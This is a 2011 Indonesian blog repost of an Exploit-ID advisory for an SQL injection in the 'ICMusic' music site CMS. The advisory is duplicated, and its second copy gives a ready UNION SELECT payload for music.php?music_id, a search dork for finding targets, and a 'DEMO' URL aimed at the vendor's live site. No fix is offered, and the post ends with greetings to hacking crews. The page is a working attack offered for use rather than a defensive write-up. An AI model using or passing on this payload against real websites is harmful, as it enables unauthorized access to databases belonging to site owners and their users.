Sabtu, 30 Juli 2011
ICMusic – Music Site Script CMS SQL Injection Vulnerability
Diposting oleh
ayo Indonesia
=====================================================================
Exploit-ID is the Exploit Information Disclosure
#########################################
I'm kaMtiEz , member of Exploit-Id
#########################################
======================================================================
#####################################################################################################
## ICMusic - Music Site Script CMS SQL Injection Vulnerability ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 11 July, 2011 ##
#####################################################################################################
[ Software Information ]
[+] Vendor : http://icloudcenter.net/
[+] Download : [ NOT FREE ] ( http://www.icloudcenter.com/music-site-script.htm )
[+] Price : $38.90
[+] version : 1.2 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#####################################################################################################
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/music.php?music_id=[num]
[ XpL ]
[ DEMO ]
[ FIX ]
dunno :">
#######################################################################################################
[ Thx TO ]
[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,Z190T
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D
[ NOTE ]
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] nothing secure ..
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure
- Web : exploit-id.com
- e-mail : root[at]exploit-id[dot]com
#########################################
I'm kaMtiEz , member of Exploit-Id
#########################################
======================================================================
#####################################################################################################
## ICMusic - Music Site Script CMS SQL Injection Vulnerability ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 11 July, 2011 ##
#####################################################################################################
[ Software Information ]
[+] Vendor : http://icloudcenter.net/
[+] Download : [ NOT FREE ] ( http://www.icloudcenter.com/music-site-script.htm )
[+] Price : $38.90
[+] version : 1.2 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#####################################################################################################
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/music.php?music_id=[num]
[ XpL ]
http://127.0.0.1/[kaMtiEz]/music.php?music_id=[num]+union+all+select+1,@@version,3,4,5,6--
[ DEMO ]
http://icloudcenter.net/demos/icmusic/music.php?music_id=-291+union+all+select+1,@@version,3,4,5,6--
[ FIX ]
dunno :">
#######################################################################################################
[ Thx TO ]
[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,Z190T
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D
[ NOTE ]
- [+] Stop Dreaming , Lets Do it !
- [+] Jangan Takut , Luka Pasti Akan Sembuh :)
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] nothing secure ..
Blog Archive
-
▼
2011
(496)
-
▼
Juli
(26)
- Conference Chat Facebook - New Facebook Fiture
- Mendapatkan Warisan Perkebunan
- Menggunakan Voice Mailbox
- Baru Punya Handphone
- Penemu Teknologi Layar Sentuh atau Touch Screen
- ICMusic – Music Site Script CMS SQL Injection Vuln...
- Pertanda Bahwa Anda Hidup di Tahun 2011
- Menggali Kutipan Kata-Kata Sang Motivator
- Pelajaran Tokoh Penemu Bersejarah
- Tanya Jawab Soal Makanan Diet
- PHP Log Access Script
- URL Shortener Script
- Fake Mailer
- Emoji - Update Status Facebook
- Flooding Comment On Facebook Wall
- Image Zoom Effect pada postingan ( CSS )
- Setting Multi Author Blogger ( Blogspot )
- Solusi lain mendaftar google adsense
- 1 day 6 big Web and Forum hacked by FLYFF666
- Setting 404 Error Page 000webhost
- Fiture Terbaru Dari Facebook ( Video Chat )
- Free Auto Text Backlink Exchange Massal
- Menampilkan Jumlah Posting Pada Blogspot
- Share MP3 on Facebook or Listen And Download
- Manfaat Blogging Dan Efek Sampingnya
- Flip Text Generator
-
▼
Juli
(26)